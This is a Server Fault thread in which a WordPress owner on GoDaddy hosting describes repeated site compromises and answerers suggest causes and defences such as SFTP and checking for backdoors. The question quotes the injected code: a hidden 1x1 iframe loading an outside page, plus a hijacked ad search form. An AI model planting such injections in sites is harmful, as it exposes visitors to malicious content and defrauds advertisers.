7

Final Update:

Things have been peaceful for the past few weeks and taught me much more about website security and risks. Here's my version of story -

I was using an older version of wordpress and probably this person caught me from google. I think it was a script attack. Its difficult to say how and when the security was actually compromised, it came to my notice on Nov 5, 2009. While I took some safety measures at that time (described below) but there's always a possibility that I missed out rechanging wordpress passwords when I formatted my work computer.

Now I've deleted all unrequired php scripts from hosting, made administration part accessible only to my IP, blocked a particular IP range that belongs to vietnam. Daily backups and other stuff. The thing is that there are so many variables involved and its too difficult to keep track of each and everything. Main lesson is be prepared for it. :)

I'm on a shared hosting plan by GoDaddy and run a WordPress website. My website was hacked for the first time on Nov 5, 2009. At that time, the hacker replaced my ads with his own. I thought it happened because of my laziness with security, but I was so wrong.

I formatted my computer and setup everything again. Replaced ESET NOD32 with Microsoft Security Essentials. Upgraded to the latest version of WordPress. Changed all passwords. Setup a new database. And other security related stuff I read here and there. Things worked well for a while until my site was hacked again today.

Last time, the guy played with a lot of files and specifically changed footer.php and all ads related files. But this time he just went to the right place and replaced with following code -

<IFRAME height=1 src="http://blackberryrss.com/check.html" frameBorder=0 width=1></IFRAME>

<form action="http://www.google.com/cse" id="cse-search-box">
  <div>
    <input type="hidden" name="cx" value="partner-pub-2815780429722377:hhm6d0-6wfw" />

    <input type="hidden" name="ie" value="ISO-8859-1" />
    <input type="text" name="q" size="31" />
    <input type="submit" name="sa" value="Search" />
  </div>
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en"></script>

Looks like that person isn't interested in manipulating database etc. but just place code and make quick money. Godaddy forwarded my ftp logs and there was an unauthorized access from IP - 117.2.56.31. This IP belongs to Vietnam and also http://blackberryrss.com has some connection to Vietnam.

There is no SSH access to my account and I connect to FTP using FireFTP. This was GoDaddy's response last time -

Upon reviewing your account we have found your FTP account has been compromised either due to malware on your local computer or a weak FTP/Hosting password.

But I had changed all passwords, deleted accounts etc. but nothing seems to work. I'm clueless at the moment. Please tell me what to do? How can I prevent unauthorized access to my account??????

Additional Details:

  • Strength of password is just Strong but not Best.
  • I personally use Windows XP SP3, Windows Firewall etc. After first attack I've learned to work using a user account and avoid administrator account.
  • When I see FTP logs for the first attack, its quite clear that person is manually doing all of this.
Aaron Hall
  • 296
  • 3
  • 12
Arpit Tambi
  • 471
  • 3
  • 5
  • 11
  • Can you divulge the strength of your passwords? The following link can help with this: http://www.microsoft.com/protect/fraud/passwords/checker.aspx – Jeff Yates Nov 23 '09 at 18:11
  • What EXACT OS are you using, what firewall, what services are running, what NICs are exposed - basically give us more info please, seeing what's been changed isn't enough, we need to know HOW it has been changed. Oh and by the way, this will have been a script that hit you, not a person on their own, 99% sure anyway. – Chopper3 Nov 23 '09 at 18:13
  • 4
    I'm hesitant to say this, but FTP is a bit of a pain. I'd be tempted to look for a hosting provider that would let me use sftp or scp. But that would probably cost more money. – Tom O'Connor Nov 23 '09 at 18:44
  • Added more details, will get one 16 character super strong password but I don't think the guy could brute force the current password. – Arpit Tambi Nov 23 '09 at 18:45
  • @Tom Could you please elaborate on SFTP or SCP. Host also offers a web based FTP through their site, is that okay? – Arpit Tambi Nov 23 '09 at 18:46
  • Thanks for the details, XP isn't really a great OS to act as any type of server, have you got access to Windows Server at all? have you disabled your administrator account or just given it a complex password? have you removed all file-shares/file-sharing-services? Are you up to date on ALL patches? – Chopper3 Nov 23 '09 at 18:47
  • Ohh, I use XP for my personal use. Hosting is on Linux and they don't offer too much details abt that. – Arpit Tambi Nov 23 '09 at 18:55
  • What version of Wordpress are you using (I realise you state the latest version, but version numbers are more useful). What Wordpress plugins are you using (and what version)? Can you get raw HTTP/FTP logs from your hosting company? This should help you determine how the hacker is getting in. – Bryan Nov 24 '09 at 13:42
  • wordpress 2.8.6, all latest plugins, lemme ask for logs from hosting company. – Arpit Tambi Nov 24 '09 at 13:47
  • @Arpit SFTP and SCP are ssh based protocols that are miles more secure than plain FTP. Web-based FTP is unlikely to be any more secure, in fact.. Is likely to be less secure, as it employs a third server. I'd be sceptical of this service. – Tom O'Connor Nov 24 '09 at 13:55
  • I changed all passwords again and did not use FTP but no success, hacker attacked for the 3rd time and placed iframe. He's is using some smart technique to access ftp without passwords. – Arpit Tambi Nov 24 '09 at 14:04
  • Completely off-topic, but I would change back to NOD32 as that's not the issue here ^^ – Oskar Duveborn Nov 24 '09 at 15:57
  • So where there any ftp logins after your last password change after which you didn't use ftp? Ie is there any indication that the change was still made using ftp? KPWINCs suggestion about email would be interesting to dig deeper into, how do you change ftp passwords - is the new one being sent out to you somehow like in an email (which is easily interceptable)? – Oskar Duveborn Nov 24 '09 at 16:01
  • I change passwords from godaddy's web interface. After I changed passwords I did not use FTP, only web based file manager that never asks for passwords. No email confirmation is sent for passwords being changed. I am working with godaddy to send me ftp logs for a deeper review. – Arpit Tambi Nov 24 '09 at 16:06
  • Also Microsoft Security Essentials actually discovered one (and only one) serious security threat that NOD32 was unable to detect. – Arpit Tambi Nov 24 '09 at 16:08
  • @Arpit: when using the web-based file manager, are you logged in via HTTPS, or just regular HTTP? Also: in my experience, web-based FTP involves the hosting company sending you a web page containing your FTP username and password. The passwords are then sent unencrypted to the FTP browser plugin/applet, which then sends them again to the FTP server. I'll never use a web-based FTP client. – rob Nov 26 '09 at 00:49
  • possible duplicate of [My server's been hacked EMERGENCY](http://serverfault.com/questions/218005/my-servers-been-hacked-emergency) – HopelessN00b Aug 25 '12 at 05:57

7 Answers7

8

Keep in mind FTP sends your password in CLEAR TEXT. So the potential for compromise is definitely there.

Another thing to consider, is your FTP password UNIQUE to your hosting? Are you sure you're not using it ANYWHERE else? No other accounts, websites, etc?

How secure is your EMAIL password? I've been involved in cases where the "weak link" was actually the EMAIL password and the culprit was just sending "forgot passwords" to the email and deleting the evidence from the email box while everyone was too busy focusing on the compromised server to notice.

Just a few things that came to mind... some other things of course would be a social engineering approach with your ISP or some software vulnerability on your server or one of the packages your hosting.

There's more (obviously) but those are typically the "usual suspects".

UPDATE:

Based on this new information (that the hacker is not using FTP to change your files) I can only assume that the most likely cause is probably an unsecured web app.

That's not the ONLY thing it can be but in cases like this is the most likely.

Another thing to consider (and check for) is if he left himself some sort of "back door" to your app. I seem to recall you mentioning before that your ISP said he came in via FTP. Is it possible he came in via FTP the first time and left himself a back door?

Also, its a shot in the dark, but I have personally witnessed compromised boxes where a hacker only came in ONE time but left a cron job that kept changing files and other various evil. Is it possible that the hacker DIDN'T come back and you're dealing with an automated script? Just something to check if you feel you've exhausted all other possibilities.

Finally, do you have access to your web logs, system logs, etc? If so, what do they say? Do they reveal any clues?

KPWINC
  • 11,274
  • 3
  • 36
  • 44
2

You might want to read Detail Post-Mortem of a WordPress Hack. Another post that gives a lot of information about a WordPress blog hack with links. WordPress itself has an FAQ about what to do after your blog has been hacked.

WordPress is a heavily targeted application just because of it's popularity. Fighting hackers of thoses sites is a full time job. From your description, it sounds like someone has found an exploite of WordPress is using it to their full advantage. You sound like you're doing everything right so far, but I'm thinking that the attacker is dropping a file into your site and the attack from that direction. The first link I pointed you to goes into a very detailed description of this and what steps they took to counter it.

In the end, you might have to think about changing from WordPress to another blogging application. Good luck defending yourself, and hope this helps some.

Chris
  • 810
  • 1
  • 7
  • 10
  • This is what happened to me. Contributing factor with me was that I had a custom theme that didn't survive "upgrades" well and I had no time to keep fixing things. Once I got hacked, I threw in the towel. Now I'm one of the blogger billions. Simplistic blog, yes -- but less hack worry. – David Mackintosh Nov 23 '09 at 20:05
  • I did everything you mentioned but hacked again, oops :( – Arpit Tambi Nov 24 '09 at 15:38
  • Then I would move on to a different blogging platform. I would rather spend time blogging rather than hunting down security holes in a piece of software. – Chris Nov 24 '09 at 16:21
1

Unless you run all FTP sessions through a secure tunnel (or better yet, use sftp) that password WILL get sniffed.

Our standard practice is to not have FTP on at all. If necessary then we only allow anonymous ftp and to heavily restrict that to a known area.

If upload is required we disallow listing ot the upload directory.

lcbrevard
  • 318
  • 2
  • 12
1

GoDaddy gives you SSH access and you could connect to your account using Putty.exe on port 22. Once you are connected you can use Putty to create 2 proxy/tunnels on port 20 and 21. Then you can use ftp through the secured tunnel to get to your files.

Or, better yet, you can just do that same thing much simpler using the PSFTP.exe command or you can connect to port 22 with FileZilla client.

djangofan
  • 4,172
  • 10
  • 45
  • 59
1

Silly question, but - have you tried changing password and using another computer whatsoever? Maybe there is a keystroke logger on your PC.

I suspect a prank here, or at least a targeted attack. Is anyone you know willing to play such a joke..?

Step out of box before getting too paranoid. It helps.

ps: or perhaps a mis-used wordpress theme. Or wrong credentials on DB access.

lorenzog
  • 2,719
  • 1
  • 18
  • 24
0

To be honest I would ask the ISP to block that IP at the firewall level. If GoDaddy is unwilling to do that, then to me that seems like they are an irresponsible hoster who won't take steps to protect your data and you should switch.

blackberryrss.com is located in the US so you have some leverage you can take:
DNS Stuff

Report the publisher ID here, Google is EXTREMELY serious when it comes to fraudlent activity within their adsense network. Report Google Adsense abuse

In fact to be honest GoDaddy shouldn't even be letting it in because the reverse DNS of that IP is "localhost" which is a HUGE red flag. Only 1 IPv4 address should resolve to localhost (assuming of course we are just talking about the standard IP addresses) and that is 127.0.0.1. DNS Stuff

To dig even deeper into the rabbit hole it seems like bluehost is hosting their server, so give them a ring and see what they want to do (if anything).

And you always have the option to report to your local authorities (it is a crime to gain access to networks and computers which you have no right or privilege to access)

Natalie Adams
  • 745
  • 1
  • 6
  • 15
  • I reported that publisher id earlier today. So on 3rd attack, hacker just placed iframe no ad codes this time. But no response from Google Adsense so far. – Arpit Tambi Nov 24 '09 at 15:33
  • I will talk GoDaddy regarding this IP. I already mailed to HostMonster but no response so far. May be I'll email to bluehost too. – Arpit Tambi Nov 24 '09 at 15:37
0

Your FTP password's getting sniffed, it happens with our sites hosted there a great deal.

Dan
  • 488
  • 1
  • 3
  • 16